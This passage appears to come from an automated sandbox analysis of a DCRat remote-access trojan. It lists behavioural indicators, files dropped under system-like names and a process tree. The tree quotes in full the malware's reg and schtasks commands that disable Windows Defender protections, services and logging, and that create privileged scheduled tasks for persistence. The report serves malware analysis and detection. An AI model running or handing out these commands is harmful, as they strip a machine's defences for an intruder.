| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
Executes dropped EXE
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\ModifiableWindowsApps\sihost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MSBuild\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\cc11b995f2a76d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\cc11b995f2a76d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\24dbde2999530e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ja-JP\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\it-IT\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\it-IT\61a52ddc9dd915 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\InputMethod\SHARED\conhost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\InputMethod\SHARED\088424020bedd6 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\ja-JP\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\ja-JP\61a52ddc9dd915 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\diagnostics\system\IESecurity\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Performance\WinSAT\DataStore\38384e6a620884 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{03B65D90-6E45-4BD2-9E62-6DFEC28F04A9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"
C:\Windows\system32\w32tm.exe
